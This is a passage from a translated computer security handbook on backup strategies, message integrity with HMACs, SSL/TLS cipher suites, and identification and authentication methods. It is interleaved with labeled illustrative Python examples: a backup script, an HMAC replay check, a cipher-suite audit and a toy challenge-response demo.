Copies only those files that have changed since a particular event (such as the patching of a vulnerable application) or a particular date (such as the date of the last full backup). Full backups and incremental backups are usually used together. A common backup strategy today is as follows:
• Make a full backup on the first day of the week, every other week; and
• Make an incremental backup after each event that occurs on the system following the last full backup. Because this kind of incremental backup archives the files that have changed since the last full backup was made, it is sometimes called a differential backup.
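The full-plus-differential strategy above can be sketched with tar archives. This is an added example, not code from the handbook; the function names, file names, and fixed timestamps are constructed for illustration. Each differential is taken relative to the last full backup and written to its own archive, and the returned list serves as an index of what each archive holds.

```python
import os
import tarfile
import tempfile


def changed_since(root, since):
    """Relative paths of regular files under root modified after `since`."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.getmtime(full) > since:
                found.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(found)


def write_backup(root, archive, since=None):
    """Write a full backup (since=None) or a differential backup.

    Returns the index: the names stored in this archive, so that a file can
    later be located without reading every archive.
    """
    cutoff = float("-inf") if since is None else since
    names = changed_since(root, cutoff)
    with tarfile.open(archive, "w:gz") as tar:
        for rel in names:
            tar.add(os.path.join(root, *rel.split("/")), arcname=rel)
    return names


def archive_names(archive):
    """Read the archive back and list what it really contains."""
    with tarfile.open(archive, "r:gz") as tar:
        return sorted(tar.getnames())


def put(root, rel, text, mtime):
    """Create or overwrite a sample file and give it a fixed modification time."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)
    os.utime(path, (mtime, mtime))


def demo():
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "home")
        t0 = 1_000_000_000  # constructed timestamps keep the run deterministic
        for rel in ("notes.txt", "docs/report.txt", "docs/budget.txt"):
            put(root, rel, "v1 of " + rel, t0)

        # Full backup, taken at constructed time t_full.
        t_full = t0 + 100
        full = write_backup(root, os.path.join(work, "full.tar.gz"))

        # First differential: one file was edited after the full backup.
        put(root, "docs/report.txt", "v2", t_full + 50)
        first = write_backup(root, os.path.join(work, "diff-1.tar.gz"),
                             since=t_full)

        # Second differential goes to a different archive and is again taken
        # relative to the full backup, so it also contains the earlier edit.
        put(root, "todo.txt", "new file", t_full + 150)
        second_path = os.path.join(work, "diff-2.tar.gz")
        second = write_backup(root, second_path, since=t_full)

        verified = archive_names(second_path) == second
        return full, first, second, verified


if __name__ == "__main__":
    print(demo())
```

Restoring then needs only the full archive plus the most recent differential.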
Most administrators of large systems plan and store their backups by partition or by disk drive. Different partitions usually need different backup strategies. Some partitions, such as your system partition (if it is separate), should ordinarily be backed up whenever a change is made to them, on the theory that every change you make to them is very important. For these, full backups should be used rather than incremental backups, because their backup is usable only if it is complete. Likewise, partitions that are used only for storing applications need to be backed up only when new programs are installed or the configuration of existing programs changes.
Incremental backups, on the other hand, are better suited to partitions that are used to store user files; but you may want to make this kind of backup frequently, so as to minimize the amount of work you could lose if a failure occurs.
When you make incremental backups, use a rotating set of backup tapes or disks. Tonight's backup should not be written over the tape that was used for last night's backup. Otherwise, if the computer fails in the middle of tonight's backup, you will lose all of the data on the disk, along with tonight's backup data (because it is incomplete) and last night's backup data (because part of it has been overwritten by tonight's backup). Ideally, make an incremental backup once a night, and have a separate tape for each night of the week.
How long to keep backups
It may take a week or a month before you notice that a file has been deleted. You should therefore keep some backup tapes for a week, some for a month, and some for several months. Many organizations archive their yearly or quarterly backups permanently. Some organizations also keep their annual or biennial backups forever, since doing so is a small investment against the possibility that they will someday be needed. In some countries there may be legal requirements to keep backups of certain kinds of data (such as accounting records) for a minimum period. On the other hand, it is also important to have a data destruction policy that specifies the maximum length of time for which backups are kept.
You may want to keep an index or listing of the names of the files on your backup tapes. That way, whenever you need to restore a file, you can find the right tape to use by checking the listing instead of having to read each tape individually. Keeping a printed copy of these listings is also a good idea, especially if your electronic index is stored on a system that may itself need to be restored!
If you keep backups for a long time, make sure that when you buy a new backup system, the backup data is properly migrated to it. Otherwise you may end up with tapes that cannot be read by anyone, anywhere. This has happened to major research universities and even to the U.S. National Aeronautics and Space Administration (NASA).
Other backup tips
There are several other good practices for increasing the reliability of backups:
Use redundant backup sets
You can use two separate sets of backup tapes to create a tandem backup. With this backup strategy, you make two full backups (named A and B). Then, when you make your first incremental backup - incremental A - you back up all of the files that have been created or modified since the last A backup, even if they are in the B backup. The second time you make an incremental backup - incremental B - you write out all of the files that have been created or modified since the last B backup, even if they are in incremental A. This system is resistant to failure of the backup media, because every file is backed up in two places, although it doubles the time you spend making backups.
Replace tapes as needed
Tapes are physical media, and each time you run them through a tape drive their quality degrades somewhat. Based on your experience with your tape drive and tapes, you should set a useful lifetime for every tape. Some vendors set limits for their tapes (for example, 3 years or 2000 cycles), but others do not. Pay close attention to what the vendor recommends and do not ignore it. Remember that the money you save by using a tape beyond its useful life does not compare with the cost of possibly being unable to recover from a major loss.
Keep your tape drives clean
If you store your backups on tape, follow the tape drive vendor's preventive maintenance schedule and, as recommended, use an appropriate cleaning cartridge or other mechanism. Being unable to read a tape because the tape drive is dirty is annoying, especially when it turns out that the data you wrote to the tape is corrupt and cannot be used when a failure occurs.
Verify your backups
From time to time you should try restoring a few randomly chosen files from your backups to make sure that your equipment and software are working properly. There are many stories about computer centers that lost their disk drives and, when they turned to their backup tapes, found them unreadable. This can be the result of poor-quality tapes, improper backup procedures, faulty software, operator error, or other problems.
At least once a year, you should try restoring your entire system from backups to make sure that your backup system works properly. Start with a different, unconfigured computer and see whether you can restore all of your tapes and get the computer running. Sometimes you will find that some important files are missing from your backup tapes. These practical tests are the best time to discover problems and fix them.
A very good test is to pick a file at random once a week or once a month and try to restore it. Doing so will not only show whether the backups are comprehensive; the practice gained from these restores may also make a real restore operation much simpler.
A detailed discussion of backup and restore systems could fill a book of its own - W. Curtis Preston's Unix Backup and Recovery, published by O'Reilly, is an excellent example.
Transmission integrity
Cryptography provides a way to make sure that when you send data over a network to someone else, the recipient receives it exactly as you sent it - protected from accidental corruption or deliberate tampering. A common strategy is to sign the file digitally - by computing a cryptographic digest and encrypting the digest with a symmetric or asymmetric algorithm - and then to send the result along with the file (which may itself be encrypted for confidentiality). The recipient recomputes the digest from the file and then decrypts the transmitted digest. If the two match, the integrity of the message is assured.
A hash message authentication code (HMAC) is another way to verify the integrity of a message transmitted between two parties who have agreed on a shared secret key. An HMAC combines the original message and a key and computes a message digest function over both of them. Sometimes additional information, such as protocol sequence numbers, is also included in order to defeat replay attacks. The sender computes the HMAC of the message, the key, and any additional information, and transmits the HMAC along with the original message. The recipient recomputes the HMAC using the message and its own copy of the secret key (along with the additional information, such as the expected sequence number), and then compares the computed HMAC with the received HMAC to see whether they match. If they do, the recipient knows that the original message has not been altered, because the message digest has not changed.
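The exchange described above, with a sequence number mixed into the HMAC, looks like this in outline. This is an added example, not code from the handbook; HMAC-SHA256, the class names, the key, and the messages are assumptions constructed for illustration. The sequence number is never transmitted: each side keeps its own counter, so a replayed or altered message fails the comparison.

```python
import hashlib
import hmac
import struct


def make_tag(key, seq, message):
    """HMAC-SHA256 over an 8-byte sequence number followed by the message."""
    return hmac.new(key, struct.pack(">Q", seq) + message,
                    hashlib.sha256).digest()


class Sender:
    def __init__(self, key):
        self.key = key
        self.seq = 0

    def send(self, message):
        """Return (message, tag); the tag covers the current sequence number."""
        packet = (message, make_tag(self.key, self.seq, message))
        self.seq += 1
        return packet


class Receiver:
    def __init__(self, key):
        self.key = key
        self.expected_seq = 0

    def receive(self, packet):
        """Return the message if its tag verifies for the expected sequence
        number, otherwise None. The counter advances only on success."""
        message, tag = packet
        expected = make_tag(self.key, self.expected_seq, message)
        # compare_digest avoids leaking how many leading bytes matched
        if not hmac.compare_digest(tag, expected):
            return None
        self.expected_seq += 1
        return message


def demo():
    key = b"constructed-shared-secret-for-demo"  # sample key, illustration only
    sender, receiver = Sender(key), Receiver(key)
    first = sender.send(b"transfer 100 to alice")
    second = sender.send(b"transfer 5 to bob")

    results = []
    results.append(receiver.receive(first))        # genuine: accepted
    _msg, tag = second
    results.append(receiver.receive((b"transfer 500 to bob", tag)))  # altered
    results.append(receiver.receive(first))        # replay of an old message
    results.append(receiver.receive(second))       # genuine: accepted

    # A party holding a different key cannot produce an acceptable tag.
    outsider = Sender(b"some-other-key")
    results.append(Receiver(key).receive(outsider.send(b"hello")))
    return results


if __name__ == "__main__":
    print(demo())
```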
123 W. Curtis Preston
124 Unix Backup And Recovery
125 Hash Message Authentication Code
HMACs are commonly used to harden network protocol messages against tampering, because they are much faster to compute than digital signatures and are also smaller. On the other hand, HMACs are based on a shared key that must be protected from compromise, whereas digital signatures usually work with public key systems.
Several general-purpose cryptographic protocols have been built to secure network connections. These protocols are usually assembled from a combination of cryptographic algorithms to support key exchange, authentication, encryption, and message integrity checking, together with a specification of how a client and a server will agree on algorithms, exchanged credentials, and session keys. For example, the SSL/TLS protocol supports these combinations of algorithms:
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1 export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
Each algorithm combination specifies an algorithm to use for key exchange (Kx, which can be Diffie-Hellman or RSA), authentication (Au, which can be RSA or DSS), encryption (Enc, which can be DES, triple DES, RC4, or RC2 with a specified key length), and message authentication codes (Mac, which can be SHA1 or MD5).
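A parser for the listing above, added here as an illustration and not taken from the handbook: it splits each row into the Kx, Au, Enc and Mac fields just described and reports rows marked export or whose cipher key is shorter than a caller-chosen minimum. The 128-bit default and the function names are assumptions of this example; rows that the extracted text wraps over two lines are rejoined first.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Rows as listed on this page; two are left wrapped the way the extracted text wraps them.
PAGE_ROWS = """\
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DHE-DSS-RC4-SHA
SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1
export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
"""


class Suite(NamedTuple):
    name: str
    protocol: str
    kx: str
    kx_bits: Optional[int]   # present only when the row limits the key-exchange size
    au: str
    enc: str
    enc_bits: int
    mac: str
    export: bool


ROW_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<proto>\S+)\s+"
    r"Kx=(?P<kx>[A-Za-z]+)(?:\((?P<kx_bits>\d+)\))?\s+"
    r"Au=(?P<au>\S+)\s+"
    r"Enc=(?P<enc>[A-Za-z0-9]+)\((?P<enc_bits>\d+)\)\s+"
    r"Mac=(?P<mac>\S+)"
    r"(?:\s+(?P<export>export))?\s*$"
)


def unwrap(text: str) -> List[str]:
    """Rejoin rows that were split across physical lines."""
    rows: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        first = line.split()[0]
        # A suite name never is 'export', never contains '=', never is a protocol label.
        continuation = first == "export" or "=" in first or first.startswith(("SSLv", "TLSv"))
        if continuation and rows:
            rows[-1] += " " + line
        else:
            rows.append(line)
    return rows


def parse_suite(row: str) -> Suite:
    m = ROW_RE.match(row)
    if m is None:
        raise ValueError(f"unrecognised cipher-suite row: {row!r}")
    kx_bits = m["kx_bits"]
    return Suite(m["name"], m["proto"], m["kx"], int(kx_bits) if kx_bits else None,
                 m["au"], m["enc"], int(m["enc_bits"]), m["mac"], m["export"] is not None)


def parse_listing(text: str) -> List[Suite]:
    return [parse_suite(row) for row in unwrap(text)]


def audit(suites: List[Suite], min_enc_bits: int = 128) -> Dict[str, List[str]]:
    """Map suite name -> reasons it fails the policy (threshold is an assumption)."""
    findings: Dict[str, List[str]] = {}
    for s in suites:
        reasons = []
        if s.export:
            reasons.append("export-grade suite")
        if s.enc_bits < min_enc_bits:
            reasons.append(f"Enc={s.enc}({s.enc_bits}) is below {min_enc_bits} bits")
        if reasons:
            findings[s.name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(parse_listing(PAGE_ROWS)).items():
        print(f"{name}: {'; '.join(reasons)}")
```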
Chapter Five
Identification and Authentication
Overview
Identification is the association of an identity with a subject. Authentication establishes the validity of an identity, and authorization is the association of rights or privileges with an identity. This chapter concentrates on the first two concepts. Identification and authentication may be carried out solely by the workstation a person is using, or authentication may be handled by a network-based system in which user identities are stored on a central server and shared by groups of clients.
Identification Techniques
Computers employ a variety of identification systems. The simplest are based on usernames and passwords; others rely on special hardware that can measure the distinguishing characteristics of individual human beings. There are also systems based on public key cryptography.
No identification technique is impossible to fool or bypass, and fortunately most of them do not need to be. The goal of most identification systems is not to make impersonation impossible, but to reduce the risk of impersonation and the resulting losses to an acceptable level. Another important goal of identification systems is to quantify the risk that remains once the system has been deployed. Quantifying the residual risk lets an organization make decisions about policies, about the need or desire for alternative identification systems, and even about the amount of insurance coverage needed to protect against possible fraud.
Physical Identification
Fly to an international airport and swipe your credit card through a car rental agency's card reader, and you can drive to your destination in a car that may be worth more than twenty thousand dollars. The only assurance the rental agency has that you will return its car is your promise - and the knowledge that, if you break that promise, it can cancel your credit card and you will probably go to jail.
If the rental agency did not know who you were, your promise would mean little to it. It is your driver's license, passport, or credit card, together with the worldwide computer network, that lets the rental agency find out within seconds whether your credit card is stolen, and inform your workplace and its insurance company of the trust it has placed in you.
Printed identification documents are designed around how well they can be checked physically. A passport is a good identification document because it contains information that can be verified physically (sex, height, weight, photograph, signature), it is difficult to forge, it cannot easily be misused, and it is issued by a reputable, trusted, and well-known authority that checks the person's identity before issuing the document. By contrast, a membership card for a journalism club has none of these attributes.
Computer-Based Identification Techniques
For more than fifty years, user IDs and passwords have been part of very large computer systems. Even personal computers, which had no passwords during the first two decades of their existence, are now equipped with software that can control access using user IDs and passwords. One key difference separates systems based on a user ID and password from the document-based systems discussed earlier in this chapter. Whereas most identification documents are printed with the real name of the person to be identified, user ID and password systems are interested only in establishing that the person sitting at the keyboard is the authorized user of a particular account. Traditional document-based systems deal with absolute identification, whereas user ID and password systems deal with relative identification, or establishing continuity of authorization. Performing absolute identification is an extraordinarily difficult task for a computer system. Instead, many relative identification systems have been developed. People experienced in computer security usually describe these systems as being based on "something that you know", "something that you have", or "something that you are". The following sections describe these three traditional approaches, along with a newer one: "someplace where you are".
Password-Based Systems: Something That You Know
The earliest digital identification systems were also based on passwords. In these systems every user is given a user ID and a password; to prove your identity to the computer, you simply type the password. If the typed password matches the password stored in the computer, the person is assumed to be who they claim to be.
Because passwords are easy to use and require no special hardware, they remain the most widely used authentication system in the world today. As a result of this popularity, most of us now have dozens of passwords that we must recall almost every day: personal identification numbers (PINs),[126] access codes for ATM cards, long-distance calling cards, voicemail systems and answering machines, unlocking mobile phones, unlocking desktop computers, accessing dial-up Internet service providers, retrieving e-mail, and accessing web sites. Passwords have several problems, some of which cannot be fixed; they are listed below.
• Passwords must be distributed to users. Some systems use default passwords so that a user can set their own password the first time they log in, but the defaults usually remain unchanged, and the first user to log in may not be the authorized user.
• When passwords are sent to a remote computer they may be stolen along the way. Encryption can reduce this risk, but if a person enters a PIN at an automated teller machine and someone else watches over their shoulder, there is no way to encrypt that number so that the observer cannot read it!
• Good passwords are easily forgotten, which leads people to write them down, to use the same password for many applications, to choose simpler passwords, or to use poor passwords that are easy to guess.
• Passwords can be shared, which may allow unauthorized people to use resources they should not.
126 Personal Identification Numbers
Physical Tokens:[127] Something That You Have
Another way people can prove their identity is by using tokens - physical objects whose possession in some way proves identity. Door keys have been used for centuries as physical access tokens; in many modern buildings, metal keys have been supplemented with magnetic card systems or systems based on radio frequency. Card access systems are preferable to metal key systems because each card can have a unique number that is assigned to an identity. In practice the system holds a list of authorized cards and opens the various doors accordingly. Time restrictions can also be added to these cards so that, for example, a low-level secretary's card cannot be used for access outside business hours.
Token-based systems are, in effect, self-policing: because users need their cards to access their accounts, they quickly report cards that are lost or stolen, and once a card has been recorded in the system as "lost" it is usually deactivated and a new card is simply issued to its holder. This is an improvement over keypad-based systems, in which people can share their PINs with others without losing their own access.
Like passwords, token-based systems also have problems:
• Tokens do not really prove who you are. Anyone who has physical possession of the token can gain access to the restricted area;
• If someone loses a token, they can no longer enter the restricted area, even though their identity has not changed; and
• Some tokens are easily copied or forged.
Token-based systems do not really identify and authenticate people; they authenticate tokens. This is especially troublesome when a token is stolen. For this reason, in high-security applications the token system is usually combined with some other means of identification, which is commonly referred to as "two-factor authentication". For example, to gain access to a room or a computer you may have to present a token and also enter an authentication code. This is the technique that automated teller machines use to identify the holders of bank accounts.
127 Physical Tokens
128 Biometric
Biometrics: Something That You Are
The third technique, whose use by computers to determine a person's identity is steadily becoming more common, is to take a physical measurement of the person and compare it with information previously recorded about them. This technique is called biometrics,[128] because it is based on measuring something about a living person. Biometrics can take many forms, such as images of the face, the retina, the iris, fingerprints, hand geometry, voice prints, handwriting, typing characteristics, or DNA patterns.
Biometric techniques can be used for both "ongoing identification" and "absolute identification". Using them for ongoing identification is simpler: the first time the user enters the system, their biometric information is recorded. On subsequent logins, the new biometric is compared with what was recorded earlier. Using biometrics for absolute identification requires building a large database that matches names with biometrics. In the United States, the Federal Bureau of Investigation (FBI) has such databases, one matching names with fingerprints and another with DNA material.
Compared with passwords and access tokens, biometrics have two clear advantages: they cannot be forgotten or lost, and they cannot easily be shared, copied, or stolen. Moving biometric technology from the laboratory to the marketplace, however, is difficult. Every biometric system exhibits a certain level of false positives, in which the system declares a match when it should not. There is a similar problem with false negatives, in which the system declares that two biometrics come from different people when in fact they come from the same person. To reduce the possibility of false matches, some biometric systems combine the biometric with a password or a token. In the case of passwords, the user is usually asked to type a secret identification code such as a PIN and then to give a biometric sample, such as a voice print. The system uses the identification code to retrieve a stored profile and then compares the biometric with the stored template. In this way the system has to compare the presented biometric with only one stored value, rather than with the entire database.
Biometrics are not exact, because:
• Before a person can be identified, their biometric characteristics must already be in the computer's database;
• If the database of biometric characteristics is compromised, biometric identification becomes worthless; and
• Unless the measuring equipment is specially protected, it is vulnerable to fraud and tampering. For example, a clever thief faced with a voice-based identification system might fool it by recording the voice of the authorized person (as they speak their passphrase), rewinding the tape, and then playing the recording back.
Location: Someplace Where You Are
Now that computer systems can readily determine where their users are, it has become possible to deploy location-based authentication systems. Although the Global Positioning System (GPS)[129] can be used to obtain location information, there are two serious obstacles to using GPS for this purpose: first, GPS usually does not work indoors, and second, there is no way to deliver location information securely from the GPS receiver to the remote service that has to perform the verification. A better choice for location-based authentication is to use the location (position-based) services offered by some mobile telephone networks. With these systems the network can determine the user's location and report it directly to the service center, without concern that the information might be tampered with while the user is being authenticated.
A simple form of location-based authentication is to have a particular computer or terminal that is authorized to perform a particular action. People in other locations are denied such privileges. To date, "location" has not been used as a general-purpose system for authentication.
129 Geographical Positioning System
Using Public Keys for Identification
The identification and authentication techniques mentioned so far all share a common flaw: to identify a person reliably, that person must be present in front of the computer or the person performing the identification. If the person is not present - if identification takes place by telephone, by fax, or over the Internet - then, because "replay attacks" are possible, the likelihood of tampering and abuse is very high.
Consider a situation in which one computer captures a user's fingerprint and another computer performs the verification. In that case an attacker can intercept the digital code of the fingerprint while it is being transmitted over the network. Once the attacker has the fingerprint transmission, they can use it to impersonate the victim. As noted, replay attacks are currently a serious threat to digital identification systems.
We have said that public key cryptography can reduce the risk of such attacks. When public key systems are used for identification, the private key is used to create a signature and the public key is used to verify it. Because the private key never leaves the possession of the person being identified - and therefore is never sent over the wire - there is no opportunity for an attacker to steal the private key and use it for malicious ends.
Control and Management of Private Keys
When a digital signature is used to prove a person's identity, what actually takes place is not exactly proof of identity. Being able to produce a valid signature does not prove that you are a particular person; it shows only that you are in possession of a particular private key. That is why keys belonging to "Hillary Clinton" and "Batman" can be found on public key servers.
For the verification of a digital signature to become authentication of identity, several prerequisites must be met:
1. Each public key/private key pair must be used by only one person.
2. The private key must be kept secure. Otherwise it may be misused, stolen, and used fraudulently by others.
3. A trust mechanism is needed, so that the person verifying the identity can trust that the name on the key really is the correct name of the key's current owner.
If keys are generated carelessly, an attacker may be able to compute the private key from the corresponding public key. If keys are not stored properly, an attacker may easily be able to steal the private key.
Although these rules look simple at first glance, implementing them correctly is very hard. Worse still, it is usually very difficult to evaluate one company's public key system and determine whether or not it is more secure than another system.
130 Realtime
131 Challenge Data
Public key cryptography can be used for authentication both online and offline. In offline authentication, the user creates a digitally signed message whose validity can be verified at some later time. In online authentication, the user is authenticated in real time[130] by a remote server. The remote server sends randomly generated challenge data[131] to the user's computer, which digitally signs it with the user's private key and sends it back. Alternatively, the remote server encrypts the challenge data with the user's public key and sends the encrypted challenge to the user, who proves their identity by decrypting it and returning it encrypted with the server's public key. Because of the challenge-response protocol, online systems are generally more secure than offline systems.
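The online challenge-response exchange from the sidebar above, as an added Python sketch (not code from the handbook), set beside the replayed-fingerprint case from the previous section. It implements the signing variant only; the toy textbook-RSA key (two Mersenne primes, no padding), the class names and the sample credential are assumptions made so that it runs with the standard library alone, and the key is far too small for real use.

```python
import hashlib
import hmac
import secrets

# Toy textbook-RSA key pair (ASSUMPTION, demo only: ~216-bit modulus, no padding).
_P, _Q = 2**127 - 1, 2**89 - 1                                 # two Mersenne primes
PUBLIC_KEY = (_P * _Q, 65537)                                  # (n, e): held by the server
PRIVATE_KEY = (_P * _Q, pow(65537, -1, (_P - 1) * (_Q - 1)))   # (n, d): never leaves the user


def _digest_int(data: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(private_key: tuple, data: bytes) -> int:
    n, d = private_key
    return pow(_digest_int(data, n), d, n)


def verify(public_key: tuple, signature: int, data: bytes) -> bool:
    n, e = public_key
    if not isinstance(signature, int) or not 0 <= signature < n:
        return False
    return pow(signature, e, n) == _digest_int(data, n)


def respond(private_key: tuple, user: str, challenge: bytes) -> int:
    """User side: sign the server's challenge, bound to the account name."""
    return sign(private_key, user.encode() + b"|" + challenge)


class StaticServer:
    """Verifier that accepts a fixed credential (e.g. an encoded fingerprint) sent to it."""

    def __init__(self, enrolled: dict) -> None:
        self._enrolled = dict(enrolled)

    def login(self, user: str, credential: bytes) -> bool:
        stored = self._enrolled.get(user)
        return stored is not None and hmac.compare_digest(stored, credential)


class ChallengeServer:
    """Verifier that issues a fresh random challenge for every login attempt."""

    def __init__(self, public_keys: dict) -> None:
        self._keys = dict(public_keys)   # user -> (n, e)
        self._pending = {}               # user -> outstanding challenge

    def new_challenge(self, user: str) -> bytes:
        challenge = secrets.token_bytes(32)
        self._pending[user] = challenge
        return challenge

    def login(self, user: str, signature: int) -> bool:
        challenge = self._pending.pop(user, None)   # single use, even on failure
        public_key = self._keys.get(user)
        if challenge is None or public_key is None:
            return False
        return verify(public_key, signature, user.encode() + b"|" + challenge)


def replay_experiment() -> dict:
    results = {}
    # Static credential: whatever crossed the network once is valid forever.
    template = b"constructed-fingerprint-encoding"   # constructed sample value
    static = StaticServer({"alice": template})
    results["static_login"] = static.login("alice", template)
    captured = template                              # what an eavesdropper recorded
    results["static_replay"] = static.login("alice", captured)
    # Challenge-response: the recorded answer matches only the old challenge.
    server = ChallengeServer({"alice": PUBLIC_KEY})
    challenge = server.new_challenge("alice")
    recorded_signature = respond(PRIVATE_KEY, "alice", challenge)
    results["signed_login"] = server.login("alice", recorded_signature)
    server.new_challenge("alice")                    # next attempt gets a new challenge
    results["signed_replay"] = server.login("alice", recorded_signature)
    return results


if __name__ == "__main__":
    for name, outcome in replay_experiment().items():
        print(name, outcome)
```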
There are several different ways to generate and store keys. Roughly in order of decreasing security, they are:
1. Use a cryptographic coprocessor such as a smart card. A public-key-capable smart card has a microprocessor, a hardware random number generator, and functions for the basic public key algorithms, as well as memory that can hold keys and public key certificates. In theory the private key never leaves the card. If you want to sign or decrypt a piece of information, that piece of information must be transferred to the card, and the signed or decrypted answer is then transferred off the card. Attackers therefore cannot use the private key unless they themselves take possession of the smart card. Passwords, PINs, fingerprint readers, or other biometric identification devices can be added to smart cards so that the card creates a signature only if the cardholder has been authenticated by the card.
On the other hand, smart cards are not without flaws and in some respects are quite fragile. If the card is lost, stolen, or damaged, the keys on it are gone and are no longer available to the user. So if the keys on the cards are going to be used over a long period to encrypt information, we may want some kind of card duplication system to keep the key from becoming unusable. If the keys are used only for digital signatures, however, this is unnecessary: if a signing key is lost, it is enough to create a new signing key, and no information is lost in the process. Smart cards are not completely secure against abuse. Cryptographic smart cards run small operating systems, and flaws in these operating systems can lead to misuse of the key. It is also possible to analyze a card physically and recover the keys on it. Even so, smart cards are currently the most secure way to store private keys.
2. Generate the keys on a desktop computer and then store the encrypted keys on a floppy disk or flash device. When the key is needed, the user inserts the floppy disk into the computer's drive; the computer reads the encrypted private key into memory, decrypts the key, and finally uses the key to sign the requested information. This technique is less secure than a smart card, because the private key must be transferred into the computer's memory, where it may be attacked by computer viruses, Trojan horses, or other malicious programs.
3. Generate the key inside the computer, then encrypt it using a passphrase[132] and store it in a file on the computer's hard disk. This is the technique that programs such as PGP and Netscape Navigator use to protect private keys. Although it is a convenient technique, its drawback is that if someone gains access to your computer and knows your passphrase, they can get at your private key. And because the key must be decrypted by the computer in order to be used, it is vulnerable to attacks on the computer's memory by malicious programs or Trojan horses.
4. The least secure way to create a public key/private key pair is to ask someone else to do it for you and then take your public and private keys from them. The fundamental problem with this approach is that, by definition, the private key has been compromised, because someone else has a copy of it. Despite this, some organizations (and some governments) force people to use keys prepared by a third party, so that the organization has a copy of every user's key and can decrypt all e-mail sent to individuals.
In practice most cryptographic systems use the third option - creating a key on a desktop computer and then storing it on the computer's hard disk.
132 Pass Phrase
Digital Certificates
